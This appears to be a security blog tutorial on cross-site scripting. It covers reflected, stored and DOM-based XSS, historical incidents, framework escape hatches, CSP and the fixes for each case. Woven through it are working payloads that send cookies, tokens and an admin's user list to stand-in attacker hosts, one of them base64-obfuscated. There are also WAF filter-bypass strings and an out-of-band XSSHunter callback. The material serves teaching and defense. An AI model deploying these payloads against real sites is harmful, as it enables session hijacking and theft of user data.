Cross-Site Scripting (XSS): Attack Types and Prevention
Key Takeaways
- Before diving into mechanics: the impact of XSS execution depends entirely on what the application's JavaScript has access to.
- In October 2005, Samy Kamkar exploited a stored XSS vulnerability in MySpace to create the fastest-spreading worm in internet history.
- Reflected XSS is the simplest variant: the payload arrives in the HTTP request (URL parameter, form field, header), the server includes it in the HTML response without sanitization, and the browser executes it.
- Stored (persistent) XSS is the high-severity variant.
- DOM-based XSS is the most misunderstood variant.
- Modern frameworks auto-escape output by default, but all of them have documented escape hatches.
Cross-site scripting is the most frequently found vulnerability in web applications. It consistently appears in bug bounty programs, penetration test reports, and OWASP's Top 10. Bug hunters have been paid millions in bounties for XSS bugs. Entire companies' session data, tokens, and user credentials have been stolen through persistent XSS payloads left in comment sections and forum posts.
The attack is conceptually simple — inject JavaScript that runs in another user's browser — but the exploitation techniques, bypass methods, and impact range from trivial to catastrophic depending on what the application does. A self-XSS in a profile field with no external visibility is a non-issue. A stored XSS in a feature visible to every admin and user, executing under their session, is a critical finding.
This post covers all three XSS variants in depth, real exploitation chains, filter bypass techniques, framework-specific escape hatches, and the complete defense stack.
Why XSS Is Dangerous
Before diving into mechanics: the impact of XSS execution depends entirely on what the application's JavaScript has access to.
What attacker-injected JavaScript can do:
- Read document.cookie and exfiltrate session tokens (classic cookie theft)
- Read localStorage and sessionStorage — where modern SPAs store auth tokens
- Make authenticated API requests on behalf of the victim (CSRF-bypass equivalent)
- Modify the DOM to inject fake login forms (credential harvesting)
- Log every keystroke the victim types (keylogger)
- Redirect the victim to a phishing page
- Take screenshots via canvas API
- Access the user's clipboard
- In high-privilege sessions: perform admin actions, create backdoor accounts, export all user data
Session cookies with HttpOnly flag can't be read by JavaScript — but localStorage tokens (JWTs, OAuth tokens) can be, and most modern SPAs store tokens in localStorage. HttpOnly cookies stop the most common XSS post-exploitation step but not all of them.
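The cookie flags that make this distinction can be set explicitly on the server. A minimal stdlib sketch using Python's http.cookies (the cookie name and token value are illustrative):

```python
from http.cookies import SimpleCookie

def session_cookie_header(token: str) -> str:
    """Build a Set-Cookie value whose flags limit XSS post-exploitation."""
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True       # invisible to document.cookie
    cookie["session"]["secure"] = True         # sent over HTTPS only
    cookie["session"]["samesite"] = "Strict"   # not sent on cross-site requests
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()

print(session_cookie_header("abc123"))
```

Remember this protects only the cookie itself: tokens kept in localStorage remain fully readable by any script running on the page.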
Real Incidents
Samy Worm (2005) — First XSS Worm in History
In October 2005, Samy Kamkar exploited a stored XSS vulnerability in MySpace to create the fastest-spreading worm in internet history. The payload:
- Added Samy as a friend of the infected user
- Displayed "but most of all, samy is my hero" on the infected user's profile
- Copied itself to the infected user's profile, infecting anyone who viewed it
Within 20 hours, Samy had over 1 million MySpace friend requests. MySpace was forced to take the entire site offline to remove the worm. Kamkar was prosecuted, placed on three years of probation, and paid $20,000 in restitution. MySpace's advertising revenue was impacted for days.
The technical limitation Kamkar had to work around: MySpace stripped the word "javascript" and the quote characters his payload needed. His workaround split the keyword across a newline ("java\nscript"), which Internet Explorer still executed inside a CSS url() value: <div style="background:url('java\nscript:eval(...)')">. He rebuilt the quote characters the filter stripped using String.fromCharCode.
British Airways (2018) — 500,000 Payment Cards
In September 2018, British Airways disclosed a breach affecting 500,000 customers who booked flights between August 21 and September 5, 2018. RiskIQ's researchers determined the attackers (Magecart Group 6) injected a 22-line JavaScript skimmer that captured form input from the BA payment page and exfiltrated it to baways.com (not the legitimate britishairways.com).
The skimmer ran in the browser during checkout and collected:
- Card number, expiry, CVV
- Name, billing address
- Email address
The attack was a supply chain XSS: attackers compromised a third-party JavaScript library loaded on BA's checkout page, injected their skimmer into that library, and it ran automatically on every transaction. BA was fined £20 million by the UK ICO (reduced from an initial £183 million figure). Total estimated theft: ~£14 million in fraudulent charges.
Twitter XSS (2014) — TweetDeck Worm
In June 2014, a self-propagating XSS worm spread across TweetDeck, Twitter's third-party client. A user discovered that TweetDeck was rendering tweet content as HTML and posted a tweet containing <script>alert()</script>. TweetDeck executed it. The worm evolved to automatically retweet itself and show pop-up alerts. Thousands of accounts were affected before TweetDeck was taken offline temporarily. No permanent data theft occurred in this case, but the attack demonstrated that a stored XSS in a widely-used client could spread virally.
Reflected XSS
Reflected XSS is the simplest variant: the payload arrives in the HTTP request (URL parameter, form field, header), the server includes it in the HTML response without sanitization, and the browser executes it. The attack is one-shot — it doesn't persist in the application.
Delivery mechanism: the attacker crafts a malicious URL and gets the victim to visit it. Methods include phishing emails, shortened URLs, social engineering, or open redirectors on the same domain.
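The payload is typically percent-encoded so the URL survives email clients and intermediate parsers. A sketch with Python's urllib (both domains are hypothetical):

```python
from urllib.parse import quote

# Hypothetical attacker and target domains, for illustration only
payload = "<script>document.location='https://attacker.example/steal?c='+document.cookie</script>"
attack_url = "https://target.example/search?q=" + quote(payload, safe="")
print(attack_url)
```

The server URL-decodes the query parameter before reflecting it, so the victim's browser still receives the raw `<script>` tag in the response body.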
Vulnerable Code
// Express.js — vulnerable search endpoint
app.get('/search', (req, res) => {
const query = req.query.q || '';
// VULNERABLE: user input directly in HTML response
res.send(`
<html>
<head><title>Search</title></head>
<body>
<h2>Results for: ${query}</h2>
<div id="results">Loading...</div>
</body>
</html>
`);
});
Normal request: GET /search?q=laptops → renders "Results for: laptops"
Attack URL: https://target.com/search?q=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
The <script> tag is inserted directly into the HTML. The browser parses and executes it. The victim's session cookie is sent to the attacker's server.
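Output encoding neutralizes exactly this: once the markup characters become entities, the browser renders the payload as inert text. Python's stdlib html.escape shows the transformation:

```python
from html import escape

payload = "<script>document.location='https://attacker.example/steal'</script>"
encoded = escape(payload)  # escapes < > & and, by default, both quote characters
print(encoded)  # the <script> tag becomes &lt;script&gt;, displayed as text, never parsed
```

This is the same transformation auto-escaping template engines apply at every interpolation point.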
Delivery Without <script> Tags
Many applications filter or encode <script> tags but miss other vectors:
<!-- Event handlers on HTML elements -->
<img src=x onerror="fetch('https://attacker.com/?c='+btoa(document.cookie))">
<svg onload="eval(atob('ZmV0Y2goJ2h0dHBzOi8vYXR0YWNrZXIuY29tLz9jPScrYnRvYShkb2N1bWVudC5jb29raWUpKQ=='))">
<body onpageshow="new Image().src='https://attacker.com/?c='+document.cookie">
<input autofocus onfocus="alert(document.cookie)">
<details open ontoggle="alert(1)">
<!-- Attribute injection — breaks out of attribute context -->
"><script>alert(1)</script>
" onmouseover="alert(1)" x="
<!-- Href/src with javascript: URI -->
<a href="javascript:alert(document.cookie)">Click me</a>
Filter Bypass Techniques
When a WAF or input filter blocks specific patterns, these bypass techniques frequently succeed:
<!-- Case variation -->
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>
<!-- Tag breaking -->
<scr<script>ipt>alert(1)</scr</script>ipt>
<!-- HTML entity encoding (the HTML parser decodes entities before the JS engine sees them) -->
<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;(1)">
<!-- Double encoding -->
%253Cscript%253Ealert(1)%253C%252Fscript%253E
<!-- Null bytes (some parsers ignore them) -->
<scr\x00ipt>alert(1)</scr\x00ipt>
<!-- SVG vectors (different parser, often less filtered) -->
<svg><script>alert(1)</script></svg>
<svg><animate onbegin=alert(1)>
<svg><set onbegin=alert(1)>
<!-- Template literals for filter bypass -->
<img src=x onerror=`alert\`1\``>
Fixed Code
// Option 1: Use a templating engine that auto-escapes
const ejs = require('ejs');
app.get('/search', (req, res) => {
const query = req.query.q || '';
// EJS auto-escapes <%= ... %> — use <%- ... %> only for trusted content
res.render('search', { query }); // search.ejs: <h2>Results for: <%= query %></h2>
});
// Option 2: Explicit HTML encoding before string insertion
const he = require('he');
app.get('/search', (req, res) => {
const query = he.encode(req.query.q || '', { useNamedReferences: true });
res.send(`<html><body><h2>Results for: ${query}</h2></body></html>`);
});
Stored XSS
Stored (persistent) XSS is the high-severity variant. The payload is saved to a database and served to every user who views the affected content. No crafted URL required — any user who loads the page becomes a victim.
Common injection points:
- Comment sections and forums
- User profile fields (bio, display name, website URL)
- Product reviews and ratings
- Support ticket subject lines
- File names in upload features
- User-agent strings displayed in admin dashboards
- Error messages that include user-submitted data
The Impact Multiplier: Admin Panel Injection
The most valuable stored XSS target is any feature that surfaces user-submitted content in an admin dashboard. If a malicious payload in a support ticket description executes JavaScript in the admin's browser:
// Payload stored in support ticket subject: (injected by attacker as a "customer")
<img src=x onerror="
fetch('/admin/api/users', {credentials: 'include'})
.then(r => r.json())
.then(data => {
fetch('https://attacker.com/exfil', {
method: 'POST',
body: JSON.stringify({
users: data,
adminCookie: document.cookie,
adminToken: localStorage.getItem('auth_token')
})
});
});
">
When an admin opens the ticket, the payload:
- Calls the admin API with the admin's session credentials
- Gets the full user list
- Exfiltrates it along with the admin's auth token to the attacker's server
The attacker now has the admin's token and the entire user database.
Vulnerable Code
# Flask — vulnerable comment system
from flask import Flask, request, Markup, render_template_string
app = Flask(__name__)
@app.route('/comment', methods=['POST'])
def post_comment():
content = request.form['content']
db.execute("INSERT INTO comments (content, created_at) VALUES (?, ?)",
(content, datetime.now()))
return redirect('/posts/1')
@app.route('/posts/1')
def view_post():
comments = db.execute("SELECT content, created_at FROM comments").fetchall()
# VULNERABLE: Markup() tells Jinja2 "trust this HTML, don't escape it"
rendered = [{'text': Markup(c['content']), 'date': c['created_at']} for c in comments]
return render_template('post.html', comments=rendered)
<!-- post.html — Jinja2 template -->
{% for comment in comments %}
<div class="comment">
{{ comment.text }} <!-- safe because Markup() was applied, but WRONG for user content -->
</div>
{% endfor %}
Fixed Code
# SAFE: pass raw strings, let Jinja2 auto-escape them
@app.route('/posts/1')
def view_post():
comments = db.execute("SELECT content, created_at FROM comments").fetchall()
# Pass dict with raw string — never wrap in Markup()
return render_template('post.html', comments=[
{'text': c['content'], 'date': c['created_at']} for c in comments
])
<!-- post.html — correct usage -->
{% for comment in comments %}
<div class="comment">
{{ comment.text }} <!-- Jinja2 auto-escapes: < becomes &lt;, > becomes &gt; -->
<!-- NEVER: {{ comment.text | safe }} — this disables escaping -->
</div>
{% endfor %}
When You Must Accept HTML: Sanitization
Rich text editors (Quill, TipTap, CKEditor) produce HTML that needs to be stored and rendered. You can't escape it — but you must sanitize it.
import bleach
ALLOWED_TAGS = ['p', 'br', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li',
'h1', 'h2', 'h3', 'blockquote', 'code', 'pre']
ALLOWED_ATTRIBUTES = {
'a': ['href', 'title'],
'*': ['class'], # Allow class for styling but no event handlers
}
def sanitize_rich_text(html: str) -> str:
# bleach strips all tags not in ALLOWED_TAGS
# and all attributes not in ALLOWED_ATTRIBUTES
# strip=True removes disallowed tags entirely (vs. escaping them)
clean = bleach.clean(
html,
tags=ALLOWED_TAGS,
attributes=ALLOWED_ATTRIBUTES,
protocols=['http', 'https', 'mailto'],
strip=True,
strip_comments=True
)
# The protocols allowlist rejects javascript: and data: URIs in href values,
# so no separate href post-processing step is needed
return clean
// DOMPurify for JavaScript (client-side or Node.js with jsdom)
import DOMPurify from 'dompurify';
const sanitizeConfig = {
ALLOWED_TAGS: ['p', 'br', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li',
'h1', 'h2', 'h3', 'blockquote', 'code', 'pre'],
ALLOWED_ATTR: ['href', 'title', 'class'],
ALLOW_DATA_ATTR: false,
// note: script tags are removed by DOMPurify by default; no extra flag is required
FORCE_BODY: false,
};
function sanitizeContent(dirty: string): string {
return DOMPurify.sanitize(dirty, sanitizeConfig);
}
Sanitize on write, not on read. Store sanitized content in the database. If you only sanitize on read, a bug in your sanitization logic — or a sanitization library update — can affect historical content inconsistently. Write-time sanitization with a strict allowlist is the correct approach.
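To make the write-time allowlist idea concrete, here is a deliberately minimal stdlib-only sketch using Python's html.parser. It is illustrative only: use DOMPurify or bleach in production, since they handle far more edge cases (nesting, URI schemes, malformed markup).

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong"}

class AllowlistSanitizer(HTMLParser):
    """Keeps allowlisted tags, drops all attributes, escapes everything else."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"<{tag}>")  # attributes dropped: no event handlers survive

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        self.parts.append(escape(data))  # text content is entity-encoded

def sanitize_on_write(html_input: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(html_input)
    parser.close()
    return "".join(parser.parts)

print(sanitize_on_write('<b>hello</b><img src=x onerror=alert(1)>'))
```

Call this in the POST handler before the INSERT, so the database only ever contains sanitized markup.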
DOM-Based XSS
DOM-based XSS is the most misunderstood variant. The vulnerability exists entirely in client-side JavaScript — the server never sees the malicious payload. The attack flows from a source (attacker-controlled data enters the JavaScript environment) to a sink (data is interpreted as code or HTML).
The server's logs are clean. No server-side sanitization can help. The vulnerability must be fixed in the frontend JavaScript code.
Sources (Where Attacker Data Enters)
// Common DOM XSS sources
location.href // full URL
location.search // query string (?key=value)
location.hash // fragment (#value)
location.pathname // URL path
document.referrer // referrer header
document.URL // alias for location.href
window.name // persists across navigations
document.cookie // if set without HttpOnly (not useful for attacker-controlled data)
// postMessage — frequently overlooked
window.addEventListener('message', (event) => {
// VULNERABLE: if event.data is used in a dangerous sink without validation
document.getElementById('output').innerHTML = event.data;
});
Sinks (Where Code Executes)
// DANGEROUS sinks — avoid with user-controlled data
element.innerHTML = value; // parses as HTML, executes scripts
element.outerHTML = value; // same
document.write(value); // same
document.writeln(value); // same
element.insertAdjacentHTML('beforeend', value);
eval(value); // executes as JavaScript
setTimeout(value, 0); // if value is a string, executed as JS
setInterval(value, 0); // same
new Function(value)(); // same
location.href = value; // javascript: URI injection
location.assign(value); // same
location.replace(value); // same
element.src = value; // javascript: URI injection in certain contexts
// SAFE alternatives
element.textContent = value; // text only, no HTML parsing
element.setAttribute('data-x', value); // attribute value, not HTML
Classic DOM XSS Example
<!-- Vulnerable page: reads URL hash to display a welcome message -->
<!DOCTYPE html>
<html>
<body>
<div id="greeting"></div>
<script>
// VULNERABLE: reads from location.hash (source) and writes to innerHTML (sink)
const name = decodeURIComponent(location.hash.slice(1));
document.getElementById('greeting').innerHTML = 'Hello, ' + name + '!';
</script>
</body>
</html>
Attack URL: https://target.com/welcome#<img src=x onerror=alert(document.cookie)>
The server returns a completely normal response. In the browser:
- JavaScript reads location.hash (the source) → #<img src=x onerror=alert(document.cookie)>
- .slice(1) removes the #
- decodeURIComponent decodes the URL encoding
- innerHTML receives the <img> tag and creates a DOM element
- src=x fails to load, triggering onerror
- alert(document.cookie) executes
The server log shows a completely normal GET request with no suspicious query parameters.
Fix
// SAFE: textContent treats value as literal text, no HTML parsing
const name = decodeURIComponent(location.hash.slice(1));
document.getElementById('greeting').textContent = 'Hello, ' + name + '!';
postMessage DOM XSS
// Vulnerable page receiving postMessage
window.addEventListener('message', function(event) {
// VULNERABLE: no origin validation, innerHTML sink
if (event.data.type === 'updateContent') {
document.getElementById('content').innerHTML = event.data.html;
}
});
// Attack: from an iframe or popup on a different domain
window.opener.postMessage({ type: 'updateContent', html: '<img src=x onerror=alert(1)>' }, '*');
// SAFE: validate origin, avoid dangerous sinks
const TRUSTED_ORIGINS = ['https://app.example.com', 'https://widget.example.com'];
window.addEventListener('message', function(event) {
// Validate message origin
if (!TRUSTED_ORIGINS.includes(event.origin)) {
console.warn('Rejected message from untrusted origin:', event.origin);
return;
}
if (event.data.type === 'updateContent') {
// Use textContent if only text is needed
document.getElementById('content').textContent = event.data.text;
// Or sanitize if HTML is required
const clean = DOMPurify.sanitize(event.data.html);
document.getElementById('content').innerHTML = clean;
}
});
DOM XSS in URL Routing (React)
// Vulnerable React component — reads URL param and uses dangerouslySetInnerHTML
import { useSearchParams } from 'react-router-dom';
function SearchPage() {
const [params] = useSearchParams();
const query = params.get('q') || '';
return (
<div>
{/* VULNERABLE: dangerouslySetInnerHTML with user input */}
<h2 dangerouslySetInnerHTML={{ __html: `Search results for: ${query}` }} />
</div>
);
}
// SAFE: React's default JSX rendering escapes automatically
function SearchPage() {
const [params] = useSearchParams();
const query = params.get('q') || '';
return (
<div>
{/* SAFE: React escapes query automatically */}
<h2>Search results for: {query}</h2>
</div>
);
}
Framework Escape Hatches
Modern frameworks auto-escape output by default, but all of them have documented escape hatches. These are responsible for a significant portion of XSS findings in "modern" applications.
React
// SAFE by default — React escapes all JSX expressions
function UserProfile({ bio }) {
return <p>{bio}</p>; // bio is text, not HTML — cannot contain executable scripts
}
// VULNERABLE: dangerouslySetInnerHTML
function UserBio({ bio }) {
// If bio came from user input and isn't sanitized, this is stored XSS
return <div dangerouslySetInnerHTML={{ __html: bio }} />;
}
// SAFE: sanitize before setting innerHTML
import DOMPurify from 'dompurify';
function UserBio({ bio }) {
const safeBio = DOMPurify.sanitize(bio, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
ALLOWED_ATTR: ['href'],
});
return <div dangerouslySetInnerHTML={{ __html: safeBio }} />;
}
// DANGEROUS: href with user-controlled value
function UserLink({ url, text }) {
// VULNERABLE if url can be "javascript:alert(1)"
return <a href={url}>{text}</a>;
}
// SAFE: validate URL protocol
function UserLink({ url, text }) {
const safeUrl = /^https?:\/\//i.test(url) ? url : '#';
return <a href={safeUrl} rel="noopener noreferrer">{text}</a>;
}
Vue.js
<!-- SAFE by default — Vue escapes interpolated values -->
<template>
<p>{{ userBio }}</p> <!-- escaped, safe -->
</template>
<!-- VULNERABLE: v-html directive -->
<template>
<div v-html="userBio"></div> <!-- NOT escaped — renders as HTML -->
</template>
<!-- SAFE: sanitize before v-html -->
<template>
<div v-html="sanitizedBio"></div>
</template>
<script>
import DOMPurify from 'dompurify';
export default {
computed: {
sanitizedBio() {
return DOMPurify.sanitize(this.userBio);
}
}
}
</script>
Angular
// Angular's default [innerHTML] binding applies DomSanitizer automatically
// But bypassSecurityTrust* methods disable this
// SAFE: Angular's default binding
@Component({
template: `<div [innerHTML]="userBio"></div>` // Angular sanitizes automatically
})
// VULNERABLE: bypass methods
import { DomSanitizer } from '@angular/platform-browser';
@Component({
template: `<div [innerHTML]="trustedHtml"></div>`
})
export class CommentComponent {
trustedHtml: SafeHtml;
constructor(private sanitizer: DomSanitizer, private userService: UserService) {
// VULNERABLE: tells Angular "I trust this, skip sanitization"
this.trustedHtml = this.sanitizer.bypassSecurityTrustHtml(userService.getBio());
}
}
// SAFE: use Angular's sanitize() method instead of bypass
@Component({
template: `<div [innerHTML]="safeHtml"></div>`
})
export class CommentComponent {
safeHtml: string;
constructor(private sanitizer: DomSanitizer) {
// sanitize() returns an escaped/sanitized string or null (SecurityContext is imported from '@angular/core')
this.safeHtml = this.sanitizer.sanitize(SecurityContext.HTML, userBio) ?? '';
}
}
Next.js (Server-Side and Client-Side)
// Next.js server component — vulnerable
export default async function Page({ params }) {
const data = await fetchData(params.id);
// VULNERABLE: dangerouslySetInnerHTML with unescaped server data
return (
<article dangerouslySetInnerHTML={{ __html: data.content }} />
);
}
// SAFE: sanitize on the server before rendering
import { sanitize } from 'isomorphic-dompurify';
export default async function Page({ params }) {
const data = await fetchData(params.id);
const safeContent = sanitize(data.content, {
ALLOWED_TAGS: ['p', 'h2', 'h3', 'ul', 'ol', 'li', 'a', 'strong', 'em', 'code', 'pre'],
ALLOWED_ATTR: ['href', 'class'],
});
return <article dangerouslySetInnerHTML={{ __html: safeContent }} />;
}
Content Security Policy
CSP is the browser-enforced defense layer that blocks script execution even when encoding fails. A properly configured CSP with nonces makes XSS exploitation dramatically harder — injected script tags without the correct nonce will be blocked by the browser.
Nonce-Based CSP
// Next.js middleware — generate nonce per request
import { NextResponse } from 'next/server';
import type { NextRequest } from 'next/server';
import { randomBytes } from 'crypto';
export function middleware(request: NextRequest) {
const nonce = randomBytes(16).toString('base64');
const csp = [
`default-src 'self'`,
`script-src 'self' 'nonce-${nonce}'`, // only scripts with this nonce execute
`style-src 'self' 'nonce-${nonce}'`,
`img-src 'self' data: https:`,
`font-src 'self'`,
`connect-src 'self' https://api.example.com`,
`object-src 'none'`, // no Flash, no plugins
`base-uri 'self'`, // prevents base tag injection
`frame-ancestors 'none'`, // prevents clickjacking
`upgrade-insecure-requests`,
].join('; ');
const response = NextResponse.next({
request: { headers: new Headers({ ...Object.fromEntries(request.headers), 'x-nonce': nonce }) },
});
response.headers.set('Content-Security-Policy', csp);
return response;
}
// Next.js root layout — use nonce in script tags
import { headers } from 'next/headers';
export default function RootLayout({ children }) {
const nonce = headers().get('x-nonce') || '';
return (
<html>
<head>
{/* This script tag includes the nonce — browser allows it */}
<script nonce={nonce} src="/analytics.js"></script>
</head>
<body>{children}</body>
</html>
);
}
Without the nonce, an injected <script>alert(1)</script> is blocked even if it somehow makes it into the page.
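The per-request nonce pattern works the same in any server stack: generate random bytes, base64-encode them, and emit both the header value and the nonce. A framework-agnostic Python sketch (directive list trimmed for brevity):

```python
import base64
import secrets

def build_csp() -> tuple:
    """Return (nonce, Content-Security-Policy header value) for one request."""
    nonce = base64.b64encode(secrets.token_bytes(16)).decode()
    csp = "; ".join([
        "default-src 'self'",
        f"script-src 'self' 'nonce-{nonce}'",  # only scripts carrying this nonce execute
        "object-src 'none'",
        "base-uri 'self'",
    ])
    return nonce, csp

nonce, header = build_csp()
print(header)
```

The nonce must be regenerated on every response; a static or guessable nonce gives the attacker the same capability as 'unsafe-inline'.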
Testing Your CSP
# Check what CSP is deployed
curl -I https://target.com | grep -i content-security-policy
# Evaluate CSP strength
# Paste the header value into Google's CSP Evaluator at https://csp-evaluator.withgoogle.com
# Common CSP weaknesses that allow bypass:
# - 'unsafe-inline' in script-src
# - 'unsafe-eval' in script-src
# - Wildcard in script-src: *
# - Specific CDN domains that host user-uploaded files: *.cloudinary.com
# - script-src missing, falling back to default-src
A CSP with 'unsafe-inline' provides essentially zero protection against XSS. 'unsafe-eval' is nearly as bad. A common mistake is setting default-src 'self' 'unsafe-inline' — the 'unsafe-inline' in default-src applies to scripts, completely negating the protection. Treat any CSP containing these directives as if no CSP exists.
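The weakness list above is straightforward to automate. A rough heuristic checker (directive parsing is simplified; a real audit should use CSP Evaluator):

```python
def csp_weaknesses(header: str) -> list:
    """Flag CSP misconfigurations that neutralize XSS protection (simplified heuristic)."""
    directives = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    # script-src falls back to default-src when absent
    script_src = directives.get("script-src", directives.get("default-src", []))
    findings = []
    if "'unsafe-inline'" in script_src:
        findings.append("'unsafe-inline' allows injected inline scripts")
    if "'unsafe-eval'" in script_src:
        findings.append("'unsafe-eval' allows eval-based payloads")
    if "*" in script_src:
        findings.append("wildcard source allows any external script")
    if "script-src" not in directives and "default-src" not in directives:
        findings.append("no script-src or default-src: scripts are unrestricted")
    return findings

print(csp_weaknesses("default-src 'self' 'unsafe-inline'"))
```

Note how the default-src fallback is what makes `default-src 'self' 'unsafe-inline'` dangerous: the weak source list silently becomes the script policy.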
Detection: Finding XSS in Code and in Black-Box Testing
Code Review Checklist
# Python/Jinja2 red flags
{{ variable | safe }} # disables escaping
Markup(user_controlled_value) # marks as trusted HTML
render_template_string(f"... {user_input} ...") # SSTI and XSS combined risk
// JavaScript red flags
element.innerHTML = value; // direct HTML injection
element.outerHTML = value;
document.write(value);
element.insertAdjacentHTML('afterbegin', value);
eval(userInput);
setTimeout(userInput, 0); // string arg to setTimeout
new Function(userInput)();
location.href = 'javascript:' + value;
// React red flags
dangerouslySetInnerHTML={{ __html: unverifiedData }}
<a href={userProvidedUrl}> // javascript: URI risk
<img src={userProvidedUrl}> // javascript: URI risk
// Angular red flags
bypassSecurityTrustHtml(userInput)
bypassSecurityTrustScript(userInput)
bypassSecurityTrustUrl(userInput)
bypassSecurityTrustResourceUrl(userInput)
Black-Box Testing
# Step 1: Find reflection points
# Inject a unique string and look for it in the response
curl -s "https://target.com/search?q=PWNSY_TEST" | grep PWNSY_TEST
# Step 2: Test for HTML context injection
curl -s "https://target.com/search?q=<b>PWNSY</b>" | grep -i '<b>PWNSY</b>'
# If you see the literal <b>PWNSY</b> unencoded, HTML injection is possible
# Step 3: Test for script execution
curl -s 'https://target.com/search?q=<script>alert(1)</script>' | grep -i 'script'
# Step 4: Use dalfox for automated XSS discovery
dalfox url "https://target.com/search?q=FUZZ" --waf-evasion --follow-redirects
# Step 5: Burp Suite DOM Invader
# Install DOM Invader canary into browser through Burp Suite
# Browse the application; DOM Invader automatically detects DOM XSS sources/sinks
XSS Hunter for Out-of-Band Detection
Some XSS payloads execute in contexts where you can't see the output (admin panels, email notifications, PDF renderers):
// XSSHunter payload — executes, sends report to your endpoint
'"><script src=https://yourdomain.xss.ht></script>
XSSHunter captures:
- The full page HTML when the payload fired
- Screenshot of the page
- The URL the payload fired on
- The browser's cookies
- The authenticated user's identity
Use a hosted XSS Hunter service (the original xsshunter.com shut down in 2023; Truffle Security runs a hosted successor) or self-host the open source version.
Defense Stack Summary
| Defense | What It Prevents | How to Implement |
|---|---|---|
| Output encoding | Reflected and stored XSS at render time | Use framework defaults; never apply the safe filter or dangerouslySetInnerHTML to user data |
| textContent over innerHTML | DOM XSS at sink | Audit every innerHTML assignment |
| Input sanitization | Stored XSS when HTML is required | DOMPurify, bleach, OWASP Java HTML Sanitizer |
| CSP with nonces | Execution of injected scripts | Strict CSP header, regenerate nonce per request |
| HttpOnly cookies | Session token theft via document.cookie | Set cookie flags: HttpOnly; Secure; SameSite=Strict |
| URL scheme validation | javascript: URI injection | Validate href/src values to only allow https: |
| postMessage origin validation | Cross-origin DOM XSS | Always validate event.origin |
The defense hierarchy in priority order:
- Output encoding — context-aware escaping at every insertion point eliminates reflected and stored XSS at the rendering layer
- Avoid dangerous sinks — textContent instead of innerHTML, no eval(), no dangerouslySetInnerHTML on user data
- Input sanitization on write — for rich text, sanitize with a strict allowlist before storage
- Content Security Policy — nonce-based CSP adds browser enforcement that catches encoding failures
- HttpOnly + SameSite cookies — limits post-exploitation impact even when XSS executes
Output encoding is table stakes. Every framework does it by default. Every XSS vulnerability in a modern framework application exists because a developer explicitly bypassed those defaults. If you find dangerouslySetInnerHTML, | safe, bypassSecurityTrust*, or innerHTML = on user-controlled data in a code review, you have a finding.